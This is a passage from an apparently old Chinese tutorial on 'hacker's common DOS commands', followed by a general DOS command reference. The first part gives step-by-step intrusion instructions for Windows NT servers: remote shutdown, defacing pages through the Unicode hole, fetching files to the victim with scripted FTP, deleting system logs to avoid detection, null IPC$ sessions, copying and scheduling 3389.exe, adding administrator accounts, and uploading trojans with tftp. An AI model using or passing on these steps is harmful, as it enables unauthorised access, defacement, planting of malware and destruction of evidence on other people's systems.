ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP
粉紅色的就是登陸過這部系統的用戶,可能你不知道怎麼看,大家是不是看到了一竄數字,只要這竄數字是<03>的話,那他前面的就是用戶。
這里的用戶是PENTIUMII。
8:Shutdown
關了對方的NT伺服器的命令
Shutdown \\IP地址 t:20
20秒後將NT自動關閉,三思後才能運行這個命令,這樣對對方造很大的損失,要做個有良心的入侵者呀。
9:DIR
這個命令沒什麼好講,但是卻非常重要,他是查看一目錄里的所有文件、文件夾。
你可以本地試下。
10:echo
著名的漏洞Unicode,這個命令可以簡單的黑一下有這個漏洞的主機。
我們假設我們要把「反獨裁,反一黨制!」寫入index.htm,有2種方法,大家看看有什麼區別。
echo 反獨裁,反一黨制!>index.htm
echo 反獨裁,反一黨制!>>index.htm
第一個的意思是覆蓋index.htm原有的內容,把「反獨裁,反一黨制!」寫進index.htm。
第二個的意思是把「反獨裁,反一黨制!」加到index.htm裡面。
「>>」產生的內容將追加進文件中,「>」則將原文件內容覆蓋。
大家可以本地試下。
可能你會問,這樣簡單黑下有什麼好玩的,其實他可以用來下載主頁到對方的目錄里。
1、首先,我們需要申請一個免費的主頁空間。
2、用echo在可寫目錄下建立如下內容的txt文件:(以chinren伺服器為例。)
open upload.chinaren.com(你的FTP伺服器,申請時你的空間提供商會給你的)
cnhack(你申請時的用戶名)
test(你申請時的密碼)
get index.htm c:\inetpub\wwwroot\index.htm(這里是把你空間上的index.htm下載到對方的c:\inetpub\wwwroot\index.htm)
bye(退出FTP對話,相當在98下的DOS,用EXIT退出DOS)
具體的做法:
輸入 echo open upload.chinaren.com> c:\cnhack.txt
輸入 echo cnhack >> c:\cnhack.txt
輸入 echo 39abs >> c:\cnhack.txt
輸入 echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
最後輸入 ftp -s:c:\cnhack.txt (利用ftp的-s參數,執行文件里的內容。)
等命令完成時,文件已經下載到你指定的文件里了。
注意:取得文件後,請刪除cnhack.txt。(如果不刪除,很容易會給別人看到你的密碼。)
記得要 del c:\cnhack.txt
11:attrib
這個命令是設置文件屬性的。如果你想黑一個站,而他的主頁的文件屬性設置了只讀,那就很可憐呀,想刪除他也不行,想覆蓋他也不行。倒!不過有這個命令就別怕了。
attrib -r index.htm
這個命令是把index.htm的只讀屬性去掉。
如果把「-」改為「+」則是把這個文件的屬性設置為只讀
----------------------
attrib +r index.htm
這個命令是把index.htm的屬性設置為只讀。
12:del
當你看到這個標題可別倒下啊!現在要離開127.0.0.1了,要刪除日誌,當然要刪除日誌啦!想被捉嗎。呵呵。
NT的日誌有這些
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
只要刪除這些就可以了。有些系統NT安裝在D盤或其他盤,就要把C改成其他盤。
黑客常用dos命令2
建立一個空連接
命令:net use \\192.168.0.198\ipc$ "" /user:"administrator"
查看遠程主機的共享資源
命令:net view \\ip
查看遠程主機的當前時間
命令: net time \\ip
得到遠程主機的NetBIOS用戶名列表(需要打開自己的NBT)
命令:nbtstat -A ip
刪除連接:
net use \\127.0.0.1\ipc$ /del
映射/刪除遠程共享:
net use z: \\127.0.0.1\c
向遠程主機復制文件:
路徑\文件名 \\IP\共享目錄名,如:
d:\3389.exe \\IP\c$ 即將d盤下的3389.exe復制到對方c盤內
把遠程主機上的文件復制到自己的機器里:
\\127.0.0.1\c$\xinxin.exe c:\
遠程添加計劃任務:
at \\IP 時間 程序名 如:
at \\IP 11:00 3389.exe
1)查看本地主機的共享資源(可以看到本地的默認共享)
net share
2)得到本地主機的用戶列表
net user
3)顯示本地某用戶的帳戶信息
net user 帳戶名
4)顯示本地主機當前啟動的服務
net start
5)啟動/關閉本地服務
net start 服務名
net stop 服務名
6)在本地添加帳戶
net user 帳戶名 密碼 /add
7)激活禁用的用戶
net uesr 帳戶名 /active:yes
8)加入管理員組
net localgroup administrators xuliguo /add
tftp -i 你的IP get **.exe c:\winnt\system32\**.exe
m溢出的對方SHELL後在DOS下上傳木馬
tftp -i 自已的IP get ***.exe
time
at \\對方的IP 時間 ***.exe
DOS命令大全
一)MD——建立子目錄
1.功能:創建新的子目錄
2.類型:內部命令
3.格式:MD[盤符:][路徑名]〈子目錄名〉
4.使用說明:
(1)「盤符」:指定要建立子目錄的磁碟驅動器字母,若省略,則為當前驅動器;
(2)「路徑名」:要建立的子目錄的上級目錄名,若預設則建在當前目錄下。
例:(1)在C盤的根目錄下創建名為FOX的子目錄;(2)在FOX子目錄下再創建USER子目錄。
C:、>MD FOX (在當前驅動器C盤下創建子目錄FOX)
C:、>MD FOX 、USER (在FOX 子目錄下再創建USER子目錄)
(二)CD——改變當前目錄
1.功能:顯示當前目錄
2.類型:內部命令
3.格式:CD[盤符:][路徑名][子目錄名]
4.使用說明:
(1)如果省略路徑和子目錄名則顯示當前目錄;
(2)如採用「CD、」格式,則退回到根目錄;
(3)如採用「CD.。」格式則退回到上一級目錄。
例:(1)進入到USER子目錄;(2)從USER子目錄退回到子目錄;(3)返回到根目錄。
C:、>CD FOX 、USER(進入FOX子目錄下的USER子目錄)
C:、FOX、USER>CD.。 (退回上一級根目錄)
C:、FOX>CD、 (返回到根目錄)
C:、>
(三)RD——刪除子目錄命令
1.功能:從指定的磁碟刪除了目錄。
2.類型:內部命令
3.格式:RD[盤符:][路徑名][子目錄名]
4.使用說明:
(1)子目錄在刪除前必須是空的,也就是說需要先進入該子目錄,使用DEL(刪除文件的命令)將其子目錄下的文件刪空,然後再退回到上一級目錄,用RD命令刪除該了目錄本身;
(2)不能刪除根目錄和當前目錄。
例:要求把C盤FOX子目錄下的USER子目錄刪除,操作如下:
第一步:先將USER子目錄下的文件刪空;
C、>DEL C:、FOX、USER、*。*
第二步,刪除USER子目錄。
C、>RD C:、FOX、USER
(四)DIR——顯示磁碟目錄命令
1.功能:顯示磁碟目錄的內容。
2.類型:內部命令
3.格式:DIR [盤符][路徑][/P][/W]
4.
使用說明:/P的使用;當欲查看的目錄太多,無法在一屏顯示完屏幕會一直往上卷,不容易看清,加上/P參數後,屏幕上會分面一次顯示23行的文件信息,然後暫停,並提示;Press
any key to continue
/W的使用:加上/W只顯示文件名,至於文件大小及建立的日期和時間則都省略。加上參數後,每行可以顯示五個文件名。
PATH——路徑設置命令
1.功能:設備可執行文件的搜索路徑,只對文件有效。
2.類型:內部命令
3.格式:PATH[盤符1]目錄[路徑名1]{[;盤符2:],〈目錄路徑名2〉…}
4.使用說明:
(1)當運行一個可執行文件時,DOS會先在當前目錄中搜索該文件,若找到則運行之;若找不到該文件,則根據PATH命令所設置的路徑,順序逐條地到目錄中搜索該文件;
(2)PATH命令中的路徑,若有兩條以上,各路徑之間以一個分號「;」隔開;
(3)PATH命令有三種使用方法:
PATH[盤符1:][路徑1][盤符2:][路徑2]…(設定可執行文件的搜索路徑) PATH:(取消所有路徑)
PATH:(顯示目前所設的路徑)
(六)TREE——顯示磁碟目錄結構命令
1.功能:顯示指定驅動器上所有目錄路徑和這些目錄下的所有文件名。
2.類型:外部命令
3.格式:TREE[盤符:][/F][》PRN]
4.使用說明:
(1)使用/F參數時顯示所有目錄及目錄下的所有文件,省略時,只顯示目錄,不顯示目錄下的文件;
(2)選用>PRN參數時,則把所列目錄及目錄中的文件名列印輸出。
(七)DELTREE——刪除整個目錄命令
1.功能:將整個目錄及其下屬子目錄和文件刪除。
2.類型:外部命令
3.格式:DELTREE[盤符:]〈路徑名〉
4.使用說明:該命令可以一步就將目錄及其下的所有文件、子目錄、更下層的子目錄一並刪除,而且不管文件的屬性為隱藏、系統或只讀,只要該文件位於刪除的目錄之下,DELTREE都一視同仁,照刪不誤。使用時務必小心!!!
五、磁碟操作類命令
(一)formAT——磁碟格式化命令
1.功能:對磁碟進行格式化,劃分磁軌和扇區;同時檢查出整個磁碟上有無帶缺陷的磁軌,對壞道加註標記;建立目錄區和文件分配表,使磁碟作好接收DOS的准備。
2.類型:外部命令
3.格式:formAT〈盤符:〉[/S][/4][/Q]
4.使用說明:
(1)命令後的盤符不可預設,若對硬碟進行格式化,則會如下列提示:WARNING:ALL DATA ON NON
——REMOVABLE DISK
DRIVE C:WILL BE LOST !
Proceed with format (Y/N)?
(警告:所有數據在C盤上,將會丟失,確實要繼續格式化嗎?)
(2)若是對軟盤進行格式化,則會如下提示:Insert mew diskette for drive A;
and press ENTER when ready…
(在A驅中插入新盤,准備好後按回車鍵)。
(3)選用[/S]參數,將把DOS系統文件IO.SYS
、MSDOS.SYS及COMMAND.COM復制到磁碟上,使該磁碟可以做為DOS啟動盤。若不選用/S參數,則格式化後的磙盤只能讀寫信息,而不能做為啟動盤;
(4)選用[/4]參數,在1.2MB的高密度軟碟機中格式化360KB的低密度盤;
(5)選用[/Q]參數,快速格式化,這個參數並不會重新劃分磁碟的磁軌貌岸然和扇區,只能將磁碟根目錄、文件分配表以及引導扇區清成空白,因此,格式化的速度較快。
(6)選用[/U]參數,表示無條件格式化,即破壞原來磁碟上所有數據。不加/U,則為安全格式化,這時先建立一個鏡象文件保存原來的FAT表和根目錄,必要時可用UNFORRMAT恢復原來的數據。
(二)UNformAT恢復格式化命令
1.功能:對進行過格式化誤操作丟失數據的磁碟進行恢復。
2.類型:外部命令
3.格式:UNformAT〈盤符〉[/L][/U][/P][/TEST]
4.使用說明:用於將被「非破壞性」格式化的磁碟恢復。根目錄下被刪除的文件或子目錄及磁碟的系統扇區(包括FAT、根目錄、BOOT扇區及硬碟分區表)受損時,也可以用UNformAT來搶救。
(1)選用/L參數列出找到的子目錄名稱、文件名稱、大孝日期等信息,但不會真的做formAT工作。
(2)選用/P參數將顯示於屏幕的報告(包含/L參數所產生的信息)同時也送到列印機。運行時屏幕會顯示:「Print out will
be sent to LPT1」
(3)選用/TEST參數只做模擬試驗(TEST)不做真正的寫入動作。使用此參數屏幕會顯示:「Simulation only」
(4)選用/U參數不使用MIRROR映像文件的數據,直接根據磁碟現狀進行UNformAT。
(5)選用/PSRTN;修復硬碟分區表。
若在盤符之後加上/P、/L、/TEST之一,都相當於使用了/U參數,UNformAT會「假設」此時磁碟沒有MIRROR映像文件。
注意:UNformAT對於剛formAT的磁碟,可以完全恢復,但formAT後若做了其它數據的寫入,則UNformAT就不能完整的救回數據了。UNformAT並非是萬能的,由於使用UNformAT會重建FAT與根目錄,所以它也具有較高的危險性,操作不當可能會擴大損失,如果僅誤刪了幾個文件或子目錄,只需要利用UNDELETE就夠了。
三) CHKDSK——檢查磁碟當前狀態命令
1.功能:顯示磁碟狀態、內存狀態和指定路徑下指定文件的不連續數目。
2.類型:外部命令
3.格式:CHKDSK [盤符:][路徑][文件名][/F][/V]
4.使用說明:
(1)選用[文件名]參數,則顯示該文件佔用磁碟的情況;
(2)選[/F]參數,糾正在指定磁碟上發現的邏輯錯誤;
(3)選用[/V]參數,顯示盤上的所有文件和路徑。
(四)DISKCOPY——整盤復制命令
1.功能:復制格式和內容完全相同的軟盤。
2.類型:外部命令
3.格式:DISKCOPY[盤符1:][盤符2:]
4.使用說明:
(1)如果目標軟盤沒有格式化,則復制時